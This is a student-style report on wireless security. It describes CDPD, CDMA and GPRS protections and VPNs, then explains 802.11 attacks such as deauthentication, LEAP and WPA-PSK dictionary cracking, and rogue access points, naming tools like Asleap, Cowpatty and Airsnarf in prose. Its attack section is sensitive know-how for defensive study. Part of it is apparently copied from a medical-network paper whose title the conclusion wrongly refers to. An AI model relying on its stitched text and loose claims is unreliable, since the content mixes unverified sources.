Data Security in Wireless Networks (extended)

8/7/2019 Data Security in Wireless Networks (extended)

1/26

1

ABSTRACT

Wireless Wide Area Networks (WAN) are a popular method of wirelessly

accessing data over the Internet. A major concern for many corporate users of

wireless WANs is data security and how to protect data that is transmitted over

these wireless networks. There are many features of these wireless networks,

which provide user and data security. This paper discusses the security features for

CDPD,CDMA, and GPRS networks, as well as an introduction to virtual private

networks (VPN) and how these applications can be used to enhance the overall

security of data on wireless networks.

For each of the technologies presented in this paper, a brief

overview of the wireless network is given, followed by a discussion of each of the

features of that network that contribute to the overall security of the network.


2/26

2

CONTENTS

CHAPTER

NO.

TOPICS PAGE

NO.

1 Cellular Digital Packet Data (CDPD) 5

1.1 Introduction

1.2 Operation of CDPD

1.3 Features of CDPD

1.3.1 Subscriber equipment security

1.3.2 Authentication

1.3.3 Airlink encryption

1.3.4 Network security

1.3.5 Private networks

2 CODE DIVISION MUTIPILE ACCESS (CDMA) 8

2.1 Introduction

2.2 Spread spectrum

2.3 Features of CDMA

2.3.1 Lock Codes


3/26

3

2.3.2 ESN and MIN numbers

2.3.3 A-keys


2.3.5 Authentication challenge

2.3.6 Voice privacy

2.3.7 Signaling Message Encryption

2.4 Smart card technology

3 General Packet Radio Service (GPRS) 12

3.1 Introduction

3.2 Operation of GPRS

3.3 Features of GPRS

3.3.1 Subscriber security


3.3.3

Encryption

3.3.4 Network security

3.3.5 Additional encryption


4/26

4

3.3.6 Private APN

4 Virtual Private Networks (VPN) 15

4.1

INTRODUCTION4.2 VPN overview

4.3 Example of a VPN connection

4.4 VPN vendors

4.5 Strengths of a VPN

5 Data Security and wireless networks: mutually exclusive? 18

5 Conclusion 25

6 Bibliography 26


5/26

5

1. CELLULAR DIGITAL PACKET DATA (CDPD)1.1 INTRODUCTION: CDPD is a secure, proven, and reliable protocol that has been

used for several years by law enforcement, public safety, and mobile professionals to

securely access critical, private information. CDPD has several features to enhance

the security of the mobile end users data and these are discussed below.

1.2 OPERATION OF CDPD: -

A brief overview of the operation of the CDPD network is as follows: A wireless

modem (or Mobile End SystemM-ES) communicates by radio with the Mobile Data

Base Station (MDBS). The MDBS transfers this data by landline and microwave to the

Mobile Data Intermediate Systems (MD-IS), which processes and sends the information,

by Intermediate System gateways (routers), to the appropriate destination.

CDPD network structure

The modem refers to the wireless modem in the CDPD network. The MDBS is the

cellular tower serving a specific geographical area. The MD-IS is a computer device that


6/26

6

serves as the control point for CDPD in a specific region (usually covering several

MDBSs).

1.3

FEATURES OF CDPD: -

1.3.1 Subscriber equipment security: -

Each modem on a CDPD network is identified by a unique Network Entity

Identifier (NEI) assigned by the CDPD carrier, which gives the CDPD modem an Internet

Protocol (IP) address visible to the rest of the Internet. Each modem device also has an

Equipment Identifier (EID), which is a fixed number, unique to that modem. No two

devices in CDPD can have the same EID. When a user signs up for service with a CDPD

service provider, the user gives the EID to the service provider. This EID then becomes

part of the Subscriber Directory Profile that the service provider maintains for each

subscriber. A subscriber, who replaces their modem with a newer one, must report the

new EID to the CDPD carrier. Until the carrier assigns this new EID to the subscribers

NEI, the new modem will not work on the CDPD network.

1.3.2 Authentication: -

In order to prevent piracy and cloning of CDPD devices, and thus fraudulent

network use and billing, the CDPD standard provides sophisticated mechanisms for NEI

authentication and verification. It can confirm that only the authorized modem, with the

assigned NEI, is using that NEI.

Using the Diffie-Hellman Electronic Key Exchange mechanism, the

authentication process uses three numbers: the NEI, the Authentication Sequence

Number (ASN), and the Authentication Random Number (ARN), which together form

the credentials of that modem. Although a subscriber can determine their NEI, they


7/26

7

cannot obtain the ASN or ARN. When a subscribers modem performs the authentication

procedure during network registration, the MD-IS checks these credentials against the

current values of the ASN and ARN. If the stored values do not match those provided by

the modem, then the modem is not allowed to connect.

From time to time, the MD-IS generates a new (random) value for the ARN, and it then

increments the ASN by one. The MD-IS delivers the new ARN to the modem in the final

step of the encrypted registration process. The modem stores this ARN internally and

increments its local ASN by one.

1.3.3 Airlink encryption: -

CDPD is a public wireless data communications service that could be susceptible

to eavesdropping, all data (except broadcast messages) transferred between the modem

and the MD-IS is encrypted by CDPDs Encryption Services. This encryption uses RSA

algorithms and is managed by the Sub-network Dependent Convergence Protocol

(SNDCP), which provides compression, encryption, and segmentation for data

transferred over the network. It takes standard Internet packets, compresses their header

information, segments them for transfer over the CDPD network, and encrypts the

segments.

1.3.4 Network security: -

On a CDPD network, data is encrypted from the modem to the MD-IS. Beyond the MD-

IS data is generally not encrypted, much as general Internet traffic remains unencrypted

unless the end user provides it. If necessary, the carrier or end user may encrypt data

traveling over other portions of the network using other mechanisms.


8/26

8

1.3.5 Private networks: -

For CDPD customers requiring additional security, many service providers offer

an additional service, which restricts the Internet access of the users NEIs to form a

private network. This means that when data is sent from the modem to the MD-IS, the

traffic is not then routed onto the public Internet, but is restricted to within the service

providers network and routed directly to the customers host computer. This means that

the data is never publicly available on the Internet, enhancing privacy and security even

further.

2. CODE DIVISION MULTIPLE ACCESS (CDMA)

2.1 INTRODUCTION: -

CDMA is a recently patented technology but dates back to before World War II,

when inventors patented a way of sending signals over different radio frequencies using

random patterns to control torpedoes. The idea was later used to secure communications

for the U.S. government during the Cuban Missile Crisis. The U.S. military declassified

the technology in the 1980s and it has now become CDMA cellular technology.

Spread-spectrum technology works by taking the conversations or data and attaching a

code (known only to the sender and receiver) to it. The coded information is then split

into packets and transmitted along with multiple other conversations or data packets over

the network. The receiver then reassembles and decodes the data. This result in extremely

secure transmissions, because the coded information is spread over the same bandwidth,

resulting in trillions of possible combinations of coded messages.


9/26

9

2.2 Spread spectrum: -

CDMA is a spread spectrum technology, which means that the user data is

assigned a unique code and then spread over a greater bandwidth than the original

signal. The data bits of each call are then transmitted in combination with the data bits of

all the other calls in the cell. At the receiving end, the digital codes are separated from the

data, leaving only the original information that was sent.

Spread spectrum technology was traditionally used in military applications. It

was secure enough for military applications, because the signal is difficult to identify,

jam, or interfere with, due to the wide bandwidth of a spread spectrum signal. A spread

spectrum signal is very hard to detect, and appears as nothing more than a slight rise in

the background noise. Other technologies have the signal power concentrated in a

narrower band and are easier to detect.

CDMA phone calls are secure from casual eavesdroppers since a radio

receiver would not be able to pick individual digital conversations out of the overall RF

radiation in a frequency band. Even if eavesdroppers intercepted a CDMA signal it would

be almost impossible to decipher.

2.3Features of CDMA

2.3.1 Lock codes: -

A unique feature of CDMA handsets and modems is a unique code, which acts

as a network security lock. If your phone or modem is lost or stolen, it cannot be used on

another CDMA network.


10/26

10

2.3.2 ESN and MIN numbers: -

Each mobile device on a CDMA network has a unique Electronic Serial Number

(ESN) and Mobile Identification Number (MIN) associated with it. The network is able

to compare the ESN/MIN combination each time a user connects to the network, and so

increase security by not allowing cloned or unauthorized devices onto the network.

2.3.3A-keys: -

An A-key is a secret 64-bit number used during authentication and encryption on

the network. It is never revealed to the end user and is never transmitted over the air. The

A-Key is stored in the memory on the phone or modem and is only ever known to the

mobile device and Authentication Center on the network.

2.3.4Authentication: -

Authentication of a mobile device on the network is enabled by the base station,

which sends a 32-bit random number to the mobile device. The mobile device then uses a

combination of the A-key, ESN, MIN, and the random number to compute an

authentication signature, which is returned to the base station. The A-key values are also

stored on the network in the Authentication Center (AC), so the base station can also

calculate the authentication signature. Upon receipt of a Registration message, phone call

or data transmission, the network compares the Authentication signature sent by themobile device to the one that is stored on the network. If the two match, the mobile

device is allowed onto the network.


11/26

11

2.3.5Authentication challenge: -

The authentication challenge is another mechanism that the base station can use

to authenticate the mobile device at any time. The base station sends an authentication

challenge to the mobile device, which then calculates its authentication signature and

sends it to the base station that issued the authentication challenge. The base station

compares the authentication signature received from the mobile to the one stored in the

Authentication Center to determine the mobile devices validity on the network.

2.3.6 Voice privacy: -

On a CDMA network, voice privacy is provided on both the forward and reverse

channels by a pseudo-random sequence of bits, known to the mobile device and base

station. Voice privacy makes it difficult to listen to the channel and so it protects not only

voice traffic, but any data or signaling information that is transmitted as well.

2.3.7 Signaling Message Encryption: -

Signaling Message Encryption is similar to voice privacy in that it encrypts the

signal messages sent over the network. A key generated by the mobile and the base

station during the call setup does this encryption.

2.4 Smart card technology: -

A recent development is that CDMA technology now allows for the use of smart

cards on CDMA-based networks. The R-UIM (Removable User Identity Module) is

similar to the SIM (Subscriber Identity Module) cards used on GSM and GPRS networks.


12/26

12

Advantages of a R-UIM include:

Easier replacement and exchange of handsets of mobile devices The Ability to move user profiles and personal data between devices

Secure network connection

Potential for cross-standard roaming capabilities

3 GENERAL PACKET RADIO SERVICE (GPRS)

3.1 Introduction: -

GPRS is based on GSM technology; the most widely used global wireless

technology. The security architecture is therefore a solid, proven technology. GPRS

networks have many security features that ensure protection of user identities, subscriber

equipment, and user data.

3.2 Operation of GPRS: -

A Brief overview of the operation of the GPRS network is as follows: A

wireless modem (or Mobile StationMS) communicates via a radio link with the Base

Transceiver Subsystem (BTS). The BTS transfers this data to a Base Station Controller

(BSC), which separates voice and data traffic. Data is then transferred to the Serving

GPRS Support Node (SGSN), which authenticates the MS, and then on to the Gateway

GPRS Support Node (GGSN), which acts as the gateway to external networks (such as

the Internet or the service providers network). The data is then sent, via routers, to the

appropriate destination.


13/26

13

3.3 Features of GPRS: -

3.3.1 Subscriber security: -

One of the security features on GPRS networks is the Subscriber Identity Module

(SIM) Card. This is a small electronic card that fits into the Mobile Station (MS) phone

or data device. All of the users network account information is contained on this SIM

Card (as well as data such as personal phone book entries). Without having a valid SIM

card in the MS, it is not possible for the device to access the GSM/GPRS network. The

SIM card can

also be locked with a user-defined password (Personal Identification Number or PIN) for

additional security.

3.3.2Authentication: -

The SGSN controls the ciphering (encryption) and authentication of the MS. The

GPRS authentication and ciphering are similar to GSM networks, with a few


14/26

14

modifications. When the GPRS subscriber first connects to the network, the SGSN

authenticates the MS using data contained in the SIM card. It compares this

information with the authentication data from a database on the network, known as the

Home Location Register (HLR). During this authentication process, a non-predictablerandom number is used to generate an authentication key as part of the authentication

process, further enhancing security. Although used in the authentication process, this

authentication key is never transmitted over any part of the network.

3.3.3 Encryption: -

All data transferred between the MS and the SGSN is encrypted on GPRS

networks. During the authentication process, it can also be decided whether ciphering

(encryption) is to be used. Encryption is then established by the generation of an

encryption key. All data communication between the MS and SGSN is encrypted using

the GPRS Encryption Algorithm (GEA) a version of the A5 algorithm used on GSM

networks.

3.3.4Network security: -

The point where the service providers GPRS network connects to the Internet is

the GGSN. At this point, GPRS networks have a GGSN firewall that allows user data to

pass outside of the GPRS network, while at the same time blocking attempts to connect to

the MS from the outside. The GGSN firewall protects the MS from attacks coming from

outside the GPRS network, while the SGSN protects the user against other MS's.

Network address translation is also done by the GGSN, thus hiding the private IP

addresses of the MS from users outside of the GPRS network.


15/26

15

3.3.5Additional encryption: -

Data is generally not encrypted beyond the GGSN, much as general Internet

traffic remains unencrypted unless the end user provides it. If necessary, the carrier or

end user may encrypt data traveling over other portions of the network using other

mechanisms. An example is to create a VPN between the GGSN and the corporate

intranet being accessed. The traffic is encrypted at a VPN server and is transported in

encrypted form over the Internet to access the corporate intranet. Another option would

be a dedicated connection or leased line, which would provide additional security and

constant bandwidth, from the GGSN to the corporate intranet, completely bypassing the

Internet.

3.3.6Private APN: -

Many GPRS service providers offer a separate Access Point Name (APN) for

secure access. A standard APN will not encrypt traffic beyond the GGSN, whereas a

private APN will encrypt the traffic, using one of the methods described above,

depending on the configuration of the network.

4 VIRTUAL PRIVATE NETWORKS (VPN)

4.1 INTRODUCTION: -

Even though each of the wireless networks discussed provides a high level of

security to prevent eavesdropping or interception of data, many users require an end-to-

end security solution. This would protect data integrity at all points from the mobile

users computer to the host network. For customers wanting additional security, an end-

to-end VPN connection provides the best security. Traffic is encrypted at the VPN client


16/26

16

on the mobile device and is decrypted at the corporate VPN server. Thus, all traffic is

encrypted as it travels through the whole connection. Authentication is also in the hands

of the subscribers organization.

4.2 VPN overview: -

An IP-based VPN (that is, not a frame relay or leased line VPN) allows you to

temporarily create or join a private network across an existing public network by creating

an encrypted tunnel between two hosts. This tunnel allows you to securely transfer

information and access remote resources. A VPN has the benefits of being a secure

method of transmitting data, while still being cost effective.

4.3 Example of a VPN connection: -

To connect to a corporate network, a user connects to their wireless service

providers network as usual. The user then initiates software on their mobile device,

which requests a VPN tunnel to the VPN server on the corporate network. The VPN

server authenticates the user and creates the secure VPN tunnel. The VPN software

encrypts any data that the user sends over the wireless connection and the VPN server

then decrypts the data and forwards it to the corporate network. The VPN server encrypts

data sent to the remote user before being sent over the wireless network and the VPN

software on the users computer then decrypts it. Without a VPN connection, the

connection is only protected on the wireless network, and may not be secured over the

Internet.


17/26

17

Without a VPN

With a VPN connection, traffic is encrypted (or tunneled) over the whole connection

from the mobile users computer to the host network.

With a VPN tunnel

4.4VPN vendors: -

There are a number of companies that offer a variety of VPN solutions. Checkpoint,

Cisco, Nortel, Intel, and Microsoft are all companies that provide popular VPN solutions.

Companies like Certicom and Net motion Wireless provide solutions that are optimized

for wireless connections and mobile users.

4.5Strengths of a VPN: -

A VPN is able to offer secure access to data and provides different levels of

security that include tunneling, encryption, authentication, and authorization. VPNs allow

remote users seamless, low-cost access to corporate networks, all over a secure

connection. VPNs have lower hardware, software, and network costs, which reduce the

total cost of a secure a network. Operating costs are also lower, since there are no leased

lines, or long-distance telephone charges for remote access. VPN infrastructure is easily

adapted and expanded as an organization, and its networking requirements, grow. VPNs

that utilize the Internet avoid increasing infrastructure costs by using existing


18/26

18

infrastructure. Because VPNs are standards-based, users can access a variety of

applications or services and entire networks can be easily integrated with one another. A

VPN is more flexible than a fixed network and can be reconfigured by changing software

parameters, without changing the physical network.

5. Data Security and wireless networks: mutually exclusive?

5.1 Introduction

There have been numerous papers discussing the use of mobile devices, such as personal

data assistant (PDA) type devices, and a few which discuss the use of wireless networks

in a medical environment. While some of these papers discussed security, the pace at

which the technology has advanced has meant that the information provided in these

works is no longer current. For example, it is no longer relevant to discuss wired

equivalent privacy (WEP), the initial security measure used by wireless networks, as it

has been repeatedly shown to be fatally flawed. Although there have been further

advances in wireless security so too has there been an increase in the knowledge of the

wireless network protocol, and more importantly, any flaws they may contain. Whilst

data security is important for any user, it is obviously of paramount importance in a

medical environment. The use of mobile devices to provide access to patient records at

the point of clinical care is being trialled worldwide and is providing both access to

medical records and clinical decision support.

There are two aspects of wireless networks which lead to their insecurity.The first aspect is that it uses a broadcast medium. The information is effectively

broadcast and propagated over a wide area (up to 150m) with a suitably equipped entity

within the signal locus capable of capturing or modifying this information. The second

are the embedded vulnerabilities in the modus operandi of the 802.11 protocol. The


19/26

19

inability to verify 802.11 management and control frames is one such vulnerability,

leaving the network susceptible to attacks such as denial of service (DoS) and man-inthe-

middle (MITM) attacks.

5.2The vulnerabilities with wireless networks

The risks with using wireless networks can be broadly categorised into four categories:

denial of service, eavesdropping, protocol vulnerabilities and rogue access points (AP).

5.2.1 Denial of service

This type of attack can be perpetrated in one of two ways. It can either be

conducted through the use of a jamming technique, or by exploiting the OSI Layer Two

vulnerabilities that nexist within that the 802.11 protocol suite. The first type of attack,

that of jamming, is fairly easy to perpetrate, and is reasonably difficult to detect. A

jamming attack can be either intentional or unintentional. An intentional attack is one in

which the attacker broadcasts a very high-power signal at the same frequency that the

wireless network is operating on, causing interference to the network . The likelihood of

this type of attack being conducted is fairly low as there is no real benefit to an attacker,

unless it is to force a client to roam to a rogue AP. This type of attack may also occur

unintentionally, through the placement of a device which operates at the same frequency

in the vicinity of the wireless network. For devices that operate in the 2.4GHz

frequencies, this includes microwave ovens, some cordless phones, baby monitors and

Bluetooth devices. Bluetooth devices are known to interfere with the operation of

wireless networks.

The second category of attack, the socalled layer 2 attacks, exploits the lack of

verification of control frames in the wireless network. This control and management

information is broadcast clear text by wireless networks, and can be captured by an

attacker using a freely available packet capture tool, such as Kismet. Once gathered this


20/26

20

information can then be used against the wireless network that it was captured from, and

used to force a client to leave and rejoin a network by issuing false disassociation or

deauthentication frames.

During the reassociation process, the users logon and authentication details can be captured by the attacker. This information can then be used to further exploit the

wireless network. This type of attack can also be used to launch a man in the middle

attack against the wireless network, and can even be used to circumvent virtual private

network (VPN) systems. These layer 2 attacks are probably one of the most concerning to

IS managers as there appears to be no adequate means to prevent them from occurring.

5.3EavesdroppingThe functionality of wireless network presents one of its biggest problems.

Because wireless is a broadcast medium, there is no way to control where the information

is sent and who therefore has access to it. By modifying the drivers used with the wireless

client devices, many individuals and organisations have developed analysis tools, known

as sniffers. There are both freeware (Kismet) and commercial (Airopeek) versions of

this type of software. When used within the broadcast range of a wireless network, these

can be used to capture every packet travelling the wireless network. If an access point is

set up and used in its default configuration, then the user of such a system is vulnerable to

attack, because anyone running sniffer software can see and capture everything that a

user does across that network. This includes data (medical records), passwords and email

messages. Even when encryption is used, there is still important information which is

available to anyone within range of a wireless network. This includes the network name

(SSID), the MAC addresses of both AP and clients, and a range of other information.

Another problem with the broadcast medium is that the range is not only dictated by the

transmitter, but also by the receiver. Effective range of the wireless network is an

intersection of where the two antenna coverage patterns overlap. An attacker can increase

the distance at which they can perform an attack simply by using a larger antenna.


21/26

21

Depending on the antenna type used, the range is only limited by the ability to obtain line

of sight between attacker and victim.

5.4 Protocol Vulnerabilities

This category examines the flaws or exploits that exist in wireless networks due

to vulnerabilities with the protocol itself, and with its implementation in various

operating systems. The 802.11i security extension was developed by the IEEE to provide

increased security through stronger authentication and encryption. This was done through

the use of port based access control (802.1x) and extensible authentication protocol

(EAP) for authentication and the use of the advanced encryption standard (AES) for data

encryption. The initial measures found in the draft version of 802.11i were released under

the banner of Wi-Fi protected access (WPA), with the final measures called WPA2.

Whilst the measures included in the 802.11i extension have increased security, there have

been a number of areas identified which are of some concern. These include: the

implementation of the temporal key integrity protocol (TKIP) in WPA, problems with

802.1x authentication, and (EAP) weaknesses. Further, it appears that no attempts have

been made to address the problem with Layer 2 vulnerabilities that exist in the 802.11

protocol. This flaw in the protocol has potentially serious consequences for wireless

systems when used in certain environments.

5.4.1 802.1x protocol weaknesses

Although it is stated as being a very secure method of authenticating wireless

clients, a denial of service attack against the four-way handshake has been discovered

[16]. The researchers examined the finite states of the authentication process and

discovered a problem with the handshake process which would allow an attacker to deny


22/26

22

clients access to the network. The vulnerability in the protocol would allow an attacker to

block the handshake process by inserting one forged message. Although this attack

requires precise timing, having to be launched between message 1 and message 3 of the

legitimate handshake, it is possible. The authors have suggested a repair to the IEEE802.11i working group, which is apparently to be implemented.

5.4.2 EAP weaknesses

While each of the EAP methods listed previously provides additional security

and compatibility, they do all have potential weaknesses, and provide different strengths.

Their major weakness is that they can be vulnerable to offline dictionary attacks. The

proprietary Cisco lightweight EAP (LEAP) is probably the most vulnerable, as it is

subject to offline dictionary attack. This protocol has an interesting history, being

developed by CISCO in response to a research paper by Mishra and Arbaugh ] suggesting

that EAP was vulnerable to both session hijacking and man-inthe- middle attacks. Cisco

responded to this by producing a release which indicated that Cisco EAP (LEAP) would

prevent these attacks from occurring. Shortly thereafter, Wright discovered a

serious flaw in the LEAP protocol that left it vulnerable to offline dictionary attacks. This

meant that an attacker could capture the password information, take it away and use a

database of known words to attempt to decode the password. The researcher examined

the Cisco website and found one small brief note on it in relation to the problem. The

author contacted Cisco about this problem and they released a security bulletin, and asked

Wright to hold off on an attack tool called Asleap that he had developed. After some

time, and no notification from Cisco, the Asleap tool was released. This tool can be used

amongst other things, to recover weak LEAP passwords. Cisco has since developed the

EAP FAST method which it claims is more secure.


23/26

23

5.4.3 TKIP Pre-shared key (PSK) weaknesses

There are two WPA TKIP modes that wireless systems can use: enterprise or

consumer. The enterprise is a per-user authentication based protocol with thecombination of the 802.1x security framework, authentication server, TKIP key

management and message integrity checking (MIC). The consumer version uses a pass

phrase to generate the encryption key instead of the 802.1x process, and this system was

only meant is an interim data encryption method until the full version of WPA became

available. The aim of the consumer version of encryption was ease of deployment, rather

than strong security. The simplified system used for this consumer mode leaves it open to

an offline dictionary attack, due to the broadcasting required to create and verify a

session key. When a pre-shared key (PSK) is used instead of 802.1X, the PSK becomes

the pair-wise master key (PMK) that is used to drive the 4-way handshake that would

normally occur with an 802.1x authentication. The problem is not with WPA itself, but

implementation of the PSK can create a problem. If a PSK is used that is less than 20

characters in length, and can be found in a dictionary, then it can easily be cracked. The

problem can easily be solved by using a pass-phrase longer than 20 characters made up of

random characters. The problem occurs because most consumer level users are unlikely

to do this. Tools such as Cowpatty [25] allow for an attack to be made against a weak

pass-phrase.

5.4.4 Hotspotter - Automatic wireless client penetrationThis tool exploits the Windows XP zero wireless configuration (ZWC) in order

obtain information about a client. Hotspotter listens passively for probe request frames

sent by other clients to identify their preferred network, and compares it to a supplied list

of common hotspot network names [26]. If the probed network name matches a common

hotspot name, Hotspotter will act as an access point to allow the client to authenticate and

associate. Once associated, Hotspotter can be configured to run a command, possibly a

script to kick off a DHCP daemon and other scanning against the new victim. Once


24/26

24

associated to the rogue network, it is possible to interact with the client directly, and to

perform actions including port scanning the victim, exploiting Windows-based

vulnerabilities, deploying malware or spyware, and simulating an otherwise "real"

network using faked services (honeynet) and intercepted DNS queries.

5.5 Rogue Access PointsOne of the biggest dangers faced by users of a wireless network is that of so-

called rogue access points. These may not necessarily have been placed by an attacker,

but possibly by an employee who is not familiar with the dangers of wireless networks.

Regardless of who it was placed by, such a device is equally dangerous. A rogue AP may

be placed by an attacker, or an employee, which creates a portal into the corporate

network. It is an extremely high security breach, and is basically the equivalent of

running a CAT5 cable into your wired network from the car park or anywhere else that

has line of sight to your wireless network. If an attacker can successfully carry out such

an attack, they can potentially have full access to your entire network

5.5.1 Airsnarf - A rogue AP setup utilityThe Airsnarf utility effectively allows an attacker, with very little knowledge of

wireless or programming, to steal data from a wireless network. This utility contains the

appropriate software to issue a client with an IP address, DNS and gateway information.

It also allows for the user to configure or use whatever web page they wish. An attacker

only needs to obtain the SSID and MAC address of a valid access point, and they can

effectively pretend to be a legitimate device. Once this information has been gained, a

wireless users device may automatically connect to the rogue device without realising

that it is not a valid one. Once connected, an attacker can is able to collect a wide range

of information including user names and passwords. For example, in the case of a system

where users are forcibly redirected to a login or portal page, the Airsnarf device can

emulate this and collect logons and passwords. It is even capable of allowing users to

access the internet, allowing for other information to be captured.


25/26

25

6 CONCLUSION

There are many features of wireless WANs that provide user authentication and

data security. These are intended to provide data protection within the carriers network

but do not extend to the Internet and beyond. When a VPN is used with these networks, it

provides end-to-endsecurity for all data sent over the Internet.

Wireless networks, whilst providing the advantage of mobility and portability

also come with a long list of problems. Data security cannot be guaranteed, and neither

can availability. This situation is not likely to improve in the near future, and in fact, it is

likely that more vulnerability will be discovered over time. A high level of knowledge,

technical expertise and expense is required if a wireless network is to be used safely and

securely. Whilst many practitioners may have the financial resources to secure their

WLAN, finding a skilled person with the right knowledge to do the job may be an issue.

Future research will examine the use of wireless networks in the medical environment,

and the knowledge of the risks by those who use it. In relation to the title of this paper,

are wireless networks and medical information systems mutually exclusive? This

discussion proves that they are not. However, that is not to say that wireless networks are

100% secure, or that they should be used in every circumstance. There needs to be a

serious risk assessment made in any medical practice intending to use wireless networks

to determine whether the benefits outweigh the risks. The threats to wireless networks are

very real, and new vulnerabilities are being discovered frequently. If wireless networks

must be used, then they must be used with due care.


26/26

7 BIBLIOGRAPHY

1. www.sirreawireless.com

2. www.bitpipe.com

3. www.itpapers.com

4. www.google.com

5. Mobile communication by Schilfer

Date post:	09-Apr-2018
Category:	Documents
Upload:	kamlekar-venkateshwar
View:	224 times
Download:	0 times

Data Security in Wireless Networks (extended)

Documents